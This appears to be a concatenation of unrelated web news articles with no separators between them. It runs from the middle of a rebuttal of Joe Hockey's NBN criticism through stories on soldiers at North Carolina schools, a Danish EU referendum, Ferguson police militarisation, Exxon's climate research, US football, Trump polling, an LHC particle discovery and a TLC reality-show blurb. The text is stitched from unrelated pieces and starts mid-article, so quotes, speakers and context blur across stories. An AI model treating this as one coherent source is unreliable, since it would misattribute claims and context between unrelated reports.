It 's also worth pointing out that this cost wo n't change if the Coalition comes into power and enacts its rival NBN policy . The deployment of internal Ethernet cables into Australian premises will be needed irrespective of whether home broadband is provided by Fibre to the Home , Fibre to the Node , ADSL , HFC cable or even 4G mobile broadband . In this sense , it makes even less sense for Hockey to be complaining about it . Not only is the Shadow Treasurer wrong on this issue ; but even if he 's right , his criticism applies equally to the Coalition 's own policy . Or is the Shadow Treasurer suggesting the Coalition will subsidise my next Cat6 rollout and gigabit Ethernet switch ? It is surely welcome to .
Hockey 's third contention is that Tasmanian towns such as Midway Point , Smithton and Scottsdale will be left behind in terms of the NBN because the early rollout of the NBN fibre in those areas was deployed with different network termination units than on the mainland . These devices will be replaced progressively through the end of 2012 ; but Telstra has stated that it can not offer a commercial NBN service to customers in these towns until the equipment is replaced .
This is an easy one . Firstly , residents in these towns can buy 100Mbps NBN broadband from a range of other ISPs right now . iiNet , Internode , Exetel … the list goes on . It 's no big deal that they ca n't get Telstra services just yet . What this means is that they are ahead of the rest of Australia in being able to access high-speed broadband . Vastly ahead . These are areas in rural Tasmania able to get 100Mbps fibre broadband .
I live in urban Sydney and our area is n't even on the NBN 's three-year rollout plan , while these bushbashers are able to get the NBN right now . For Hockey to suggest that these areas are somehow behind is nothing short of ridiculous ; compared with most of Australia , they are overwhelmingly ahead . The replacement hardware which NBN Co is going to provide these poor hard-done-by souls with will eventually unlock speeds up to 1Gbps . At that point , many Australians , including many of those a stone 's throw from the Sydney CBD , will still not have fibre connections at all . In this sense , I find it hard to feel sorry for those living in rural Tasmania .
Lastly , Hockey claimed that Delimiter 's article falsely implied to that the Coalition backs a wireless-only model of broadband for Australia . This claim is patently false . Delimiter has extensively covered the Coalition 's evolving NBN policy over time , as detailed in articles here , here , here , here , here and here , to pick a handful out of dozens . To suggest that we are unaware that the Coalition 's rival NBN policy contains a mix of technologies is simply ludicrous . Place a call to your Liberal colleague Malcolm Turnbull , Mr Hockey . We suggest that Mr Turnbull is highly aware of this fact . He can barely breathe without us reporting on it .
In addition , Hockey claimed that the Coalition will meet the objective of fast broadband to Australians “ sooner ” and “ at a less exorbitant cost to taxpayers ” .
Unfortunately , there is little evidence so far for this claim , as the Coalition 's own NBN policy is so far uncosted . As Delimiter has extensively documented , the NBN is not expected to cost the Federal Government money ; it is currently expected ( based on financial projections ) to make a return on its investment in the long term of between 5.3 percent and 8.8 percent on that investment — from $ 1.93 billion in the worst case to $ 3.92 billion in the best case .
In contrast , the Coalition has not yet detailed the costs involved in its own policy , which features a scaled down approach to the NBN , focusing on the likely separation of Telstra , upgrading current HFC cable infrastructure and targeted fibre to the node rollouts , as well as , potentially , satellite and wireless use in rural areas . However , a recent analysis by Citigroup found that the Coalition 's policy would cost $ 16.7 billion . The Citigroup report did n't mention what financial return , if any , the Coalition 's proposal was slated to bring in on its own investment .
What this means is that under the information currently available , the Coalition 's own NBN policy would cost the Government money , while Labor 's NBN policy is slated to make a return on its investment . The Coalition has not yet presented any evidence for why this would not be the case .
To sum up , while I myself and the Delimiter community highly respect Joe Hockey for his engagement on this important issue , it is also important to recognise that any discussion of Government policy should be based on facts and evidence and not on misleading information and omission . While Shadow Communications Spokesperson Malcolm Turnbull has shown a strong understanding of the nuances of telco policy in recent times , exceeding the understanding of Stephen Conroy before he became Communications Minister , the rest of the Coalition front bench has not ; and its statements with respect to the NBN have been characterised by their misleading nature .
I have one final message for Mr Hockey : I understand that it is difficult for politicians to be across multiple , highly complex policy areas simultaneously . And we appreciate your efforts to do so . In engaging on this issue , you have gone beyond the call of duty and your portfolio . However , it is inappropriate for a Federal MP who is the nation 's current alternative Treasurer to extrapolate complicated matters of national policy from the fact that they use an iPad . Consumer technology is a wonderful thing , but the development of national infrastructure is a fundamentally different matter ; and a senior legislator confuses the two at their peril .
Furthermore , by continuing to perpetuate misleading information about important policy matters , you are contributing to what has in recent years become a steady decline in the quality of the national debate about such matters , and adding to an ongoing trend of bringing Australia 's political class into ill repute . When even entry-level IT professionals in Australia 's technology sector can prove politicians ' comments about telecommunications technology to be inaccurate ( and do so daily in Delimiter 's comments section ) , our great democracy is in trouble indeed .
As news of the San Bernardino shooting broke , three soldiers dressed in plain clothes decided it was the right time to start touring North Carolina elementary schools , asking “ suspicious ” questions and generally freaking everyone out .
It 's a weird story : The men were apparently in the area on official Army business—except no one could confirm it at the time , and officials were never warned in accordance with normal procedure . That oversight , it seems , may have been because the men were never authorized to visit the elementary schools—a vaguely unsettling choice they made “ on their own initiative . ”
The details , via the Jacksonville Daily News :
The men had gone to White Oak Elementary and Bogue Sound Elementary schools after noon on Wednesday and were asking questions as to whether the schools were designated as crisis evacuation centers , according to a press release from the sheriff 's office . The men were asked for ID and showed what officials say looked like military style ID cards and said they were from Fort Bragg , according to CCSO . Those IDs , however , were not verified at the time , and local military installations subsequently told investigators that there were not any exercises or security assessments underway in Carteret County .
People were reportedly so concerned that the men might be connected to the San Bernardino attack that the Sheriff 's Office ended up sending out a public press release asking for help in identifying them . Eventually officials were able to confirm the men were part of “ an official exercise that deployed teams to gather information in preparation for major disasters including military incidents , hurricane and flooding disasters , and locating food banks and shelter locations. ” Except—elementary schools were decidedly not part of the investigation .
“ This particular one fell through the cracks , ” Carteret County Sheriff Asa Buck said in an understated press release .
Helle Thorning-Schmidt says vote would allow Danes to opt in to EU legislation on a case-by-case basis
Denmark intends to hold a referendum on whether to keep its opt-outs from the European Union 's justice and home affairs rules , the prime minister , Helle Thorning-Schmidt , has said .
In a speech at the annual opening of parliament , Thorning-Schmidt said Denmark may have to leave the European cross-border crime agency Europol as soon as next autumn due to exemptions that were making it increasingly difficult to remain within the European policing agency .
The referendum would allow Danes to opt in to EU legislation on a case-by-case basis , she said . “ Then we can choose ourselves which parts of EU cooperation within justice affairs we should be part of , and which ones we should n't be part of . ”
Denmark rejected the EU Maastricht treaty in 1992 but adopted the document in a second referendum in 1993 after obtaining exemptions on the euro , joint defence , judiciary cooperation and European citizenship .
Thorning-Schmidt said a new referendum would be held after the next election , which has to be held in September next year at the latest .
Denmark 's centre-left coalition currently looks set to be voted out of office amid discontent over austerity measures and a sluggish recovery , but the plans for a referendum were also welcomed by the opposition .
“ It is something we have been calling for for a long time , ” a spokesman for the right-of-centre Venstre party told the Danish daily Berlingske .
He said leaving Europol would “ have serious consequences for the Danish police 's ability to combat transnational crime ” .
The actors will reprise their roles as Dirty Randy and Rupert Ruxin , respectively .
Two of The League 's finest guest stars have been drafted to return to the FX comedy , The Hollywood Reporter has learned exclusively .
Seth Rogen will reprise his role as porn director Dirty Randy on a Dec. 13 episode , which will see the character prepare for the end of the world . But rather than the Dec. 21 doomsday date predicted by the Mayan calendar , Dirty Randy believes Dec. 12 will be the end .
“ If the world is indeed going to end , why would n't Dirty Randy be a part of it ? ” asks The League co-creator Jackie Marcus Schaffer .
STORY : ‘ The League ' Cast and Creators Reveal 8 Secrets of Season 4
“ There 's basically a show about 12-12-12 , and Rafi ( Jason Mantzoukas ) and Dirty Randy are featured prominently , ” adds her husband and fellow co-creator , Jeff Schaffer .
Last season , Rogen appeared to produce an adult film based on Andre ( Paul Scheer ) .
And Jeff Goldblum returns as Rupert Ruxin during the Dec. 20 hourlong season finale , where the show 's co-creators say he will insert himself into a marital situation between his son ( Nick Kroll ) and daughter-in-law ( Nadine Velazquez ) . Last season , his character had an awkward Thanksgiving sexual encounter with Andre 's sister ( Sarah Silverman in a guest role ) .
As The League finishes out season four , it will release two new episodes each on Dec. 6 , 13 and 20 , and there are plenty of additional guest spots coming on those dates .
Pete 's ( Mark Duplass ) grandparents will be introduced in a Dec. 6 episode , played by Robert Wagner and Lee Meriwether .
PHOTOS : Hollywood 's Biggest Fantasy Football Fans
J . B. Smoove ( Curb Your Enthusiasm ) appears on Thursday 's episode in a role Marcus Schaffer describes as “ the most vain man you 've ever met a wheelchair . ''
Zach Woods ( The Office ) will appear on a Dec. 6 episode as “ a hipster douche , ” says Schaffer . Jayma Mays ( Glee ) will play Andre 's interior decorator Trixie Von Stein on Dec. 13 , and Bob Odenkirk ( Breaking Bad ) is slated to play Ruxin 's holiday nemesis on an episode airing Dec. 20 .
“ That 's what we love about the show , ” Schaffer said of the guest stars . “ You never know if you 're going to see Robert Wagner or Robert Griffin III . ”
The League airs at 10:30 p.m. Thursdays on FX .
Email : aaron.couch @ thr.com
Twitter : @ AaronCouch
Police wearing riot gear try to disperse a crowd Monday , Aug. 11 , 2014 , in Ferguson , Missouri . Authorities in Ferguson used tear gas and rubber bullets to try to disperse a large crowd Monday night . ( AP Photo/Jeff Roberson )
This post first appeared at The American Prospect .
Every once in a while , a dramatic news story can actually produce real reform . More often the momentum peters out once the story disappears from the news ( remember how Sandy Hook meant we were going to get real gun control ? ) , but it can happen . And now , after the aftermath of the killing of Michael Brown in Ferguson , Missouri , turned to a chaotic nightmare of police oppression , we may have an opportunity to examine , and hopefully reverse , a troubling policy trend of recent years .
The focus has now largely turned from an old familiar story ( cops kill unarmed black kid ) to a relatively unfamiliar one , about the militarization of the police . The images of officers dressed up like RoboCop , driving around in armored assault vehicles , positioning snipers to aim rifles at protesters and firing tear gas and rubber bullets at Americans standing with their hands up saying “ Do n't shoot ! ” has lots of Americans asking how things got this way . This issue offers the rarest of all things , an opportunity for bipartisan cooperation .
One member of Congress , Rep. Hank Johnson , has already said he 'll be introducing a bill to cut back on the 1033 program , under which the Department of Defense unloads surplus ( and often brand-new ) military equipment to local police departments at little or no cost . So for instance , a town might be able to acquire a Resistant Ambush Protected vehicle ( MRAP ) , designed to protect soldiers against roadside bombs and worth hundreds of thousands of dollars , for two or three grand . Radley Balko found towns with as few as 3,900 residents that had acquired an MRAP .
In the past , all that firepower has usually been directed at individuals — the person suspected of selling drugs who 's sitting at his kitchen table when a SWAT team made up of local cops , fancying itself Seal Team Six taking down Osama bin Laden , comes barrelling through the wall . But in Ferguson , a militarized police force was unleashed on an entire community .
On Thursday , Rand Paul wrote an excellent op-ed in Time magazine on both the militarization of law enforcement and the unequal treatment of black Americans by the police . As I 've suggested elsewhere , this would be a great opportunity for a liberal who , like Paul , has something of a national constituency — let 's say Elizabeth Warren — to join with him and push for a bill , whether it 's the Senate version of what Hank Johnson is proposing or a different way to accomplish a similar set of goals .
So could they actually come together ? This is unlike Sandy Hook for one big reason : in that case , there were powerful interests standing in the way of change . It was n't just the power of the NRA that stopped any gun reform from happening , it was the fact that almost no elected official in the Republican party wanted it either . That 's not the case here — as much as cops might like these shiny toys that make them feel like warriors , there is n't a core interest of the GOP at work .
On the other hand , there are limits to what the federal government can do . The militarization of the country 's police forces is something that has been growing for a couple of decades , fueled first by the War on Drugs and then by the insane idea that the police in every hamlet in every corner of the country needed to be able to wage battles against Al Qaeda strike teams . Congress could turn off the spigot that pours this equipment into these communities , but unless the federal government starts repossessing the equipment it already distributed ( highly unlikely , to say the least ) , police departments all over the country will still be awash in military gear .
And that 's the biggest challenge : the problems the Ferguson case highlights are widely distributed , through thousands of police departments and millions of interaction between cops and citizens . The federal government can respond in a limited way to what we 've all seen , but its actions will go only so far .
But I ca n't imagine there 's a police chief anywhere in America who has n't looked at this situation and concluded that the Ferguson police completely bollixed it up . They also ca n't help but notice what happened when the Ferguson police were told to stand down in favor of the Missouri state troopers , who did n't bother with the riot gear or armored personnel carriers , but just went out and listened to people , and the result was so different . So maybe some of those police chiefs will examine their own policies , when it comes to both using that equipment and dealing with crowds of protesters . Ferguson surely wo n't change everything . But it might be a start .
MEDICINE HAT , ALTA- The Redcliff RCMP got a helping hand from Batman last night .
Mark Andrew Lowe , a resident of Suffield , had come to Redcliff with his wife and young daughter . The family came to Redcliff to allow their daughter to trick or treat with a friend . Lowe and his wife tagged along , with Lowe dressed up as the Dark Knight .
After parking near the intersection of 1st Avenue and 4th Street , the Lowe family headed up the street to knock on doors . They made a circuit , and had been heading back to their parked car when they heard a loud crash , around 7:30 p.m .
Running up the street , they found that a driver had smashed into two parked cars along the road , coming to a halt between the smashed vehicles . Speaking with CHAT News on Wednesday morning , Lowe said he ran towards the scene of the crash , while his wife stayed with the children .
Once he got to the smashed car , Lowe and a woman who lived along the street opened up the driver's-side door . They found the 23-year old driver “ going completely erratic ” according to Lowe , smashing his hands on the steering wheel and the centre console .
“ I 'm full Batman suit , mask and everything , and this guy gets out , high on whatever he was on , gets out of the car , looks at me and starts to freak out , ” said Lowe .
“ He probably thought he was hallucinating , and then he was like ‘ whoa ' . ”
Lowe said the man appeared to have a head injury , and was losing blood . He also appeared to be under the influence of a drug . After the woman who had come to the scene took a look at him , Lowe told the man he had to wait for an ambulance to come .
Lowe indicated the man did n't want to sit down and wait .
“ Two minutes after that , he undid his pants and pulled his pants down , and started to move away , ” said Lowe .
“ Then he came back and started ranting and raving . He was completely out of it . ”
Lowe and the woman continued to stay with the man as he wandered around the street , eventually making his way into a nearby backyard , where he smashed a resident 's barbecue . His pants never returned to his body in that time .
“ He was literally just smashing the BBQ up and down in the yard , ” said Lowe .
Once firefighters , police , and an ambulance showed up , the man was taken into custody . Afterwards , Lowe checked on his wife and the kids , heading back home to Suffield the same night . He hopes his next Halloween is n't as exciting .
“ To me , the way he reacted to me , he probably thought he was in a scene from Batman , and I was getting the bad guy type of thing , ” said Lowe .
“ I saw the funny side of it , because it was Halloween , but funny side aside , it could have been a lot worse . ”
He plans on dressing up as Batman next year .
Corporal Shane Ryan of the Redcliff RCMP confirmed that the man was arrested on Tuesday night , and charged with impaired operation of a motor vehicle , dangerous driving , and breaches of court conditions .
Ryan also warned against citizens attempting to detain offenders , though he thought the idea of Batman helping in this incident was “ really cool ” . As for the man 's lack of pants , he said the incident was a “ one-off ” for Redcliff .
“ That 's not a common occurrence , ” said Ryan .
“ That kind of stuff , I 've seen and heard before in policing , but it 's rare . If my kids were out trick or treating , I would n't want them to come across that . ”
No one was hurt during the incident , besides the impaired driver .
INTERVIEW | Jason Zada , The Director Behind That Creepy `` Take This Lollipop '' Website
On Tuesday , we told you about “ Take This Lollipop , ” a website that creates a horror movie starring you , your Facebook profile and your information .
Just as it started to blow up across the internet , we interviewed the director , Jason Zada , about the piece , its conception and its immediate viral success .
How did you come up for the concept of “ Take This Lollipop ” ?
I 've been attracted to horror movies since I was a kid , and I always wanted to do something serious within the genre and I 've just begun to explore features . I 'm a commercial and music video director , mostly . And as I started to explore , everyone always asked me what I 'd like to do my first feature and I 'd just like to do something really good in the horror genre .
I 've had a fair bit of experience on the digital side of things in the past and I just decided that Halloween is one of my favorite holidays and it would be a good time to get under people 's skin without any gore or anything . In the piece , there 's no gore or graphic material but it 's unnerving because it 's all about you and your information . It taps into this larger collective fear we have now . We 're all leading very public lives whether we want to or not , because all of our information is on the internet . You can find anything about anybody .
What would you call this piece ? It 's not really a short film or a video or a program or an app . Where does it fall ?
Previously , I did a project for OfficeMax called Elf Yourself and at the time it came out , it was a huge viral thing . It was super silly and everyone did it . I 've always been a fan of exploring human interaction with media . When you 're in a movie theater , it 's the closest thing you have to tuning out everything and focusing on a screen . The internet provides a similar experience because when you invest your time to engage in something like that you go all in , so it 's not too hard to get caught off guard .
For me , the thing that was important in doing this was to provide an emotional punch that you could n't do in any other type of project . When I first was testing this out , I actually had friends of mine on Skype so they could watch it for the first time to see what their response was . Everyone had a moment of palpable shock . That emotional response was exactly what I was aiming for .
What kind of marketing went behind the site 's launch ?
Actually , we have yet to go out with PR on it ! I had a weird hunch that if a good friend recommends something and says you have to try something , you 'll do it . One thing that was difficult was the fact that you have to put in all your Facebook information . It 's something we do a lot because so many programs ask us to do it , but of course you 're always a little wary about it . Anyway , I sent it out to a lot of trusted friends yesterday afternoon . A couple of people posted about it on Twitter and that 's all it took to take off .
It 's an amazing experiment , because after 24 hours we 're up to over 30,000 Facebook likes and it 's been watched something like 400,000 times . Our servers crashed earlier . It 's been one of those weird things where it captures this weird nerve we 're all feeling right now and that mixed with friends ' recommendations just makes it work . I asked for a couple days before the press release to see what happens and it 's certainly been interesting .
So , one last question : Can you explain the title ?
It 's funny . Around the time of the Night Stalker in Southern California , your parents would tell you to walk directly to school and if anyone comes up in a van offering you candy , do n't take it . We 're asking people to take the bait , if you will , and it looks like a lot of people are willing to risk it .
Sign Up : Stay on top of the latest breaking film and TV news ! Sign up for our Email Newsletters here .
NEW DELHI : India continues to lag far behind China in its plans to construct border military infrastructure for swifter mobility of troops and weapons , which Manohar Parrikar will realize during his first visit to the northeast as defence minister.Accompanied by Army chief General Dalbir Singh Suhag and others , Parrikar on Saturday is also slated to visit Tawang in Arunachal Pradesh , which much like eastern Ladakh continues to be a major flashpoint between India and China . Also on the cards is a visit to the Bum La pass located on the border.Parrikar 's experience there may be akin to what his predecessor AK Antony described as “ an eye opener ” in 2007 . When Antony for the first time looked across the Nathu La border post in east Sikkim , the realisation finally hit home that China had constructed high-quality roads right till their military outposts along most stretches of the unresolved 4,057km line of actual control ( LAC ) .Indian troops , in turn , had to struggle through treacherous terrain on foot to reach their forward positions in many sectors , with no proper roads and lateral links as well as the complete lack of rail connectivity.Eight years later , the story remains somewhat same . “ In case of war , the ( Indian ) Army can not reach Tawang area in a day . While our neighbouring country can reach the border within two or three hours , our Army takes more than a day to reach there . This is a matter of great concern with regard to our defence preparedness , ” the parliamentary standing committee on defence said this week , expressing great “ dismay ” .Leave along the stark asymmetry in military capabilities , India 's much-touted plans to build the infrastructure all along the LAC continue to flounder . Only 19 of the 73 “ strategic '' all-weather roads ( which add up to 3,812km ) identified for construction along the LAC for better troop mobility almost a decade ago , for instance , have been fully completed till now.This when all the 73 roads , with more east-west lateral links as well as better access routes to strategic peaks and valleys , were to be completed by 2012 . The Border Roads Organization ( BRO ) , which has completed only 19 roads ( 625km ) of the 61 roads ( 3,410km ) entrusted to it , continues to regularly miss deadlines.With the BRO directly under the MoD now , instead of the being part of the road transport ministry earlier , the progress will be much faster now , contend officials . The government is also working to ensure faster land acquisition as well as environmental clearances , which have been among the main reasons for the long delays , they add.Incidentally , noting the BRO faced “ an acute shortage ” of manpower , vehicles and requisite machinery , the parliamentary committee said , “ In order to compete with our neighbouring countries , especially China , BRO must have the latest , state-of-the-art equipment. ” The MoD , on its part , says 16 of the strategic India-China border roads will be completed this year , with another 13 by 2016 , nine by 2017 , two by 2018 , and the rest thereafter . But only time will tell if these revised deadlines are met .
Lenny Bernstein , Exxon 's former in-house climate expert , has asserted in an email that the oil company knew about climate change as early as 1981—seven years before the phenomenon came to the attention of the general public . The company has since reportedly invested millions in climate change denial .
In the email , which was sent in response to a query from Alyssa Bernstein , the director of the Institute of Applied and Professional Ethics at Ohio University ( and no relation ) , Bernstein offered some unusually straight talk from someone who worked for years within the energy industry :
Corporations are interested in environmental impacts only to the extent that they affect profits , either current or future . They may take what appears to be altruistic positions to improve their public image , but the assumption underlying those actions is that they will increase future profits . ExxonMobil is an interesting case in point .
Exxon , the world 's biggest oil company , undertook the research on climate change while considering developing the massive Natuna gas fields off of Indonesia , Bernstein 's email explains .
When the company discovered that the reserve of natural gas was 70 percent carbon dioxide—the primary greenhouse gas and a main driver of climate change—it abandoned the project , Bernstein says . If it had been developed , the field would have been the single largest climate change driver on earth at the time , Bernstein says in his email .
But he does not attribute Exxon 's decision to forgo Natuna to altruism :
In the 1980s , Exxon needed to understand the potential for concerns about climate change to lead to regulation that would affect Natuna and other potential projects . They were well ahead of the rest of industry in this awareness . Other companies , such as Mobil , only became aware of the issue in 1988 , when it first became a political issue . Natural resource companies – oil , coal , minerals – have to make investments that have lifetimes of 50-100 years . Whatever their public stance , internally they make very careful assessments of the potential for regulation , including the scientific basis for those regulations . Exxon NEVER denied the potential for humans to impact the climate system . It did question – legitimately , in my opinion – the validity of some of the science .
A project by the environmental advocacy group Greenpeace , called Exxon Secrets , claims that Exxon has since invested over $ 30 million in climate-change-denying think tanks and research . The Guardian has reported that even efforts by members of Exxon 's founding family , the Rockefellers , failed to convince the company to move away from denial and toward clean energy in 2004 .
Bernstein 's email was included in a July 8 report by the Union of Concerned Scientists , entitled Climate Deception Dossiers—which focused on the big oil companies ExxonMobil , BP and Shell .
Quartz has reached out to ExxonMobil for comment on the email , and will update this post with any response .
An ExxonMobil spokesman told the Guardian that the company now acknowledges climate change as a risk . “ The science in 1981 on this subject was in the very , very early days and there was considerable division of opinion , ” the newspaper quotes Richard Keil as saying . “ There was nobody you could have gone to in 1981 or 1984 who would have said whether it was real or not . Nobody could provide a definitive answer . ”
The 1962 Detroit Lions season was the 33rd season in franchise history . In one of the best regular seasons in their history , the Lions posted an 11–3 record ( .786 ) , but finished two games behind the eventual NFL champion Packers in the NFL Western Conference . It was third straight season the Lions finished as runner-up to the Packers in the West .
As conference runner-up , Detroit won their third consecutive Playoff Bowl game over the Pittsburgh Steelers , 17–10 . [ 1 ] The third place game was played at the Orange Bowl in Miami on January 6 , three weeks after the end of the regular season . [ 2 ]
The Lions never trailed by more than seven points at any point in any game during the season , a feat that was not repeated for 48 years . Their 26–14 win over the Packers on Thanksgiving Day in Week 11 denied defending champion Green Bay the NFL 's first true perfect season . [ 3 ] The Lions were up 26–0 in the fourth quarter before Green Bay scored two touchdowns ; [ 4 ] the Packers had won the first meeting 9–7 in the mud in Green Bay with a late field goal on October 7 . [ 5 ] [ 6 ]
If we judged elections that are over a year ( congressional midterms ) and three years ( presidential ) away based on current approval ratings and popularity polling , Donald Trump would seem done for .
Indeed , that is the prevailing media narrative .
Though there was a recent blip upward , Trumps favorability and job approval numbers are poor .
Here is a chart of Trump 's job approval ratings from 538 based on a composite of all polls :
Here is a Real Clear Politics chart of favorability , a slightly different measure but clocking in very close to job approval numbers :
This is giving Democrats and The Resistance much cheer . But the people who do internal polling , voter interviewing and focus groups for Democrats do n't have much cheer . What do they know that the public polling about approval and favorability are not telling us ?
Politico reports , Teflon Don confounds Democrats :
Data from a range of focus groups and internal polls in swing states paint a difficult picture for the Democratic Party heading into the 2018 midterms and 2020 presidential election . It suggests that Democrats are naive if they believe Trump 's historically low approval numbers mean a landslide is coming… . The research , conducted by private firms and for Democratic campaign arms , is rarely made public but was described to POLITICO in interviews with a dozen top operatives who 've been analyzing the results coming in . “ If that 's the attitude that 's driving the Democratic Party , we 're going to drive right into the ocean , ” said Anson Kaye , a strategist at media firm GMMB who worked on the Obama and Clinton campaigns and is in conversations with potential clients for next year . Worse news , they worry : Many of the ideas party leaders have latched onto in an attempt to appeal to their lost voters — free college tuition , raising the minimum wage to $ 15 , even Medicare for all — test poorly among voters outside the base . The people in these polls and focus groups tend to see those proposals as empty promises , at best . Pollsters are shocked by how many voters describe themselves as “ exhausted ” by the constant chaos surrounding Trump , and they find that there 's strong support for a Congress that provides a check on him rather than voting for his agenda most of the time . But he is still viewed as an outsider shaking up the system , which people in the various surveys say they like , and which Democrats do n't stack up well against .
This could reflect that the unprecedented media , Democrat and NeverTrump Republican attacks are not working , and may be backfiring . Sure , people may say they do n't like the job Trump is doing and may view him unfavorably , but guess what ?
Trump 's favorability rating on Election Day 2016 was almost precisely what it is now ( a point worse , actually ) .
This is a good opportunity for me to repeat what I wrote in late July , Media overplaying its anti-Trump hand – statistics and an anecdote about a lifelong Democrat :
… I had a conversation today that anecdotally supports how out of touch the media is . The conversation was with someone I 've known for almost 20 years . He 's a lifelong Rhode Islander and Democrat who has expressed strong hostility to me toward Trump in the past . We speak every couple of months , and I 've never heard him say a good word about Trump . The political part of the conversation started by him asking me how the blog was going , and how we must be busy with all the Trump stuff . I was non-committal , something along the lines of “ sure , things are always busy. ” I fully expected a truck load of anti-Trump stuff to be dumped on me next . But that did n't happen . He then volunteered how frustrated he was with the media , and how they “ wo n't let Trump do his job. ” He said he still does n't like Trump , but was very angry at the media particularly the Russia coverage . He said ( paraphrasing ) , give me a break with that meeting , if someone offered any campaign dirt on their opponent , of course they 'd take it . The conversation continued for several minutes along the same lines , but he kept coming back to Trump not being permitted to “ do his job. ” It 's just an anecdote . But it 's meaningful to me because this friend was the last person I would have expected to have such a reaction to media coverage of Trump . Between the statistical disconnect between media coverage and what matters to people , and this anecdote , I think 2018 may not be the Democrat romp many people are predicting .
It seems that the Dem pollsters , interviewers and focus-groupers were talking to people like my friend . My conversation may have been anecdotal , but enough anecdotes make for a Democrat problem .
Victor Davis Hansen has a great post at National Review , Two Resistances . The basic thesis is that the Media-Dem-NeverTrump Resistance gets all the attention , but the real resistance is an uprising against elites , so much so that Trump is an acceptable antidote :
Yet in contrast to the media-driven “ Resistance , ” there is a more authentic ongoing resistance that Trump himself capitalized on , but hardly originated . It is a pushback against the corporate and government conglomerate of identity-politics McCarthyism , and elite coastal globalism , in which everything from going to a football game and hearing the national anthem , to watching a tennis match , to visiting a cemetery or park , to keeping up with the news of horrific weather devastation is calibrated by politics . Or rather what bothers most Americans is politics now defined as nonstop sermonizing in which a rich athlete , a Pajama Boy activist , a demagogic politician , or a quarter-educated billionaire movie star lectures less fortunate Americans on the various deplorable racists , sexists , homophobes , and Islamophobes among them . There is a populist and growing resistance to the Orwellian idea that free speech is hate speech , that equality of opportunity is defined only by equality of result , and that identity politics determines the degree of government-mandated penance and reparations… . And sometimes they vote for flawed candidates like Donald Trump , whose virtue of saying almost anything to anyone at any time is considered a sort of harsh medicine that targets the malady of identity-driven political correctness , a chemotherapy to stop metastasizing malignancy .
So there 's something going on here that the Dem insiders are picking up that rings true : People do n't have to like Trump to vote for him . And the more people attack him hysterically and unreasonably , the more they help him .
There were doubts about Todd Gurley after last season 's debacle under Jeff Fisher where he averaged just 3.2 yards per carry . Those doubts have been silenced in 2017 as he 's put together one of the best 11-game stretches in NFL history .
After Sunday 's win over the Saints , Gurley now has 1,344 yards from scrimmage and 11 touchdowns – pacing the league in both departments . Obviously , those numbers look outstanding through just 11 games , but they 're even more impressive when you consider how few other players in franchise history have matched them .
Gurley is one of four Rams running backs with 1,300 yards and 10-plus touchdowns through 11 games , joining three other Hall of Famers .
Todd Gurley is the 4th @ RamsNFL player to have 1,300+ scrimmage yards & 10+ TDs in the team 's 1st 11 games of a season . The other 3 are in the @ ProFootballHOF : Elroy “ Crazylegs ” Hirsch , 1951
Eric Dickerson , 1983
Marshall Faulk , 2000 pic.twitter.com/eoJDKILfVI — Randall Liu ( @ RLiuNFL ) November 27 , 2017
Gurley is on pace for 1,955 yards and 16 touchdowns this season , both of which would set career-highs , of course . To say he 's established himself as an elite running back would be an understatement .
Image caption The LHC has been built to investigate the fundamental building blocks of nature
The Large Hadron Collider ( LHC ) on the Franco-Swiss border has made its first clear observation of a new particle since opening in 2009 .
It is called Chi_b ( 3P ) and will help scientists understand better the forces that hold matter together .
The as-yet unpublished discovery is reported on the Arxiv pre-print server .
The LHC is exploring some of the fundamental questions in `` big physics '' by colliding proton particles together in a huge underground facility .
Detail in the sub-atomic wreckage from these impacts is expected to yield new information about the way the Universe is constructed .
The Chi_b ( 3P ) is a more excited state of Chi particles already seen in previous collision experiments , explained Prof Roger Jones , who works on the Atlas detector at the LHC .
`` The new particle is made up of a 'beauty quark ' and a 'beauty anti-quark ' , which are then bound together , '' he told BBC News .
`` People have thought this more excited state should exist for years but nobody has managed to see it until now .
`` It 's also interesting for what it tells us about the forces that hold the quark and the anti-quark together - the strong nuclear force . And that 's the same force that holds , for instance , the atomic nucleus together with its protons and the neutrons . ''
The LHC is designed to fill in gaps in the Standard Model - the current framework devised to explain the interactions of sub-atomic particles - and also to look for any new physics beyond it .
In particular , it is using the collisions to try to pin down the famous Higgs particle , which physicists hypothesise can explain why matter has mass .
Discoveries such as Chi_b ( 3P ) are an important part of this quest because they add to the wider background knowledge , says Prof Jones , from Lancaster University , UK .
`` The better we understand the strong force , the more we understand a large part of the data that we see , which is quite often the background to the more exciting things we are looking for , like the Higgs .
`` So , it 's helping put together that basic understanding that we have and need to do the new physics . ''
Prof Paul Newman , from the University of Birmingham , added : `` This is the first time such a new particle has been found at the LHC . Its discovery is a testament to the very successful running of the collider in 2011 and to the superb understanding of our detector which has been achieved by the Atlas collaboration already . ''
And Andy Chisholm , a PhD student from Birmingham who worked on the analysis , said : `` Analysing the billions of particle collisions at the LHC is fascinating . There are potentially all kinds of interesting things buried in the data , and we were lucky to look in the right place at the right time . ''
THURSDAY : The Tigers have `` serious '' interest in Chamberlain , according to ESPN 's Buster Olney ( on Twitter ) .
WEDNESDAY , 1:46pm : The Tigers are a possible destination for Chamberlain as well , tweets Tim Brown of Yahoo Sports .
1:32am : The Astros are interested in Joba Chamberlain as a buy-low option , Evan Drellich of the Houston Chronicle reports ( via Twitter ) . Chamberlain is the latest free agent to be linked to the Astros , who also reportedly have some interest in Michael Morse , Jesse Crain , and Chad Gaudin , among others .
Chamberlain , 28 , had arguably the worst year of his big league career in 2013 , posting a 4.93 ERA in 45 appearances for the Yankees . However , his 3.54 ERA on the road was significantly better than his 6.23 mark at home , and his velocity and strikeout rates remained solid . Assuming he can reduce his control issues going forward , he looks like a solid bounceback candidate .
On Tuesday , we heard that Chamberlain had received a one-year , $ 3MM proposal from an interested team . It initially appeared as if the Diamondbacks had put that offer on the table , but at least one report suggested Arizona had n't offered the right-hander a contract . The Cubs and Royals were also mentioned as potential suitors for Chamberlain over the weekend .
“ TLC 's My Strange Addiction has tackled a variety of issues over the years , ranging from food rituals involving the consuming of materials like light bulbs and pottery to that of individuals dedicated to living outside of what we deem normalcy – including spending hours at a time dressed as babies . In our latest documentary , we turn our attention to Brennan Walter , a 23-year-old man from Concord , New Hampshire who has let a clothing company from New York , Supreme , rule over everything he does .
Imagine a scenario where Walter insists that his wife of a year , Sally , be decked head to toe in Supreme wear whenever they are intimate . “ Without it on , ” Sally says , “ he wo n't even look at me , let alone touch me ! He has forced his taste in clothing onto everyone around him . He even insists on naming our son “ James ” after the Supreme founder ! ”
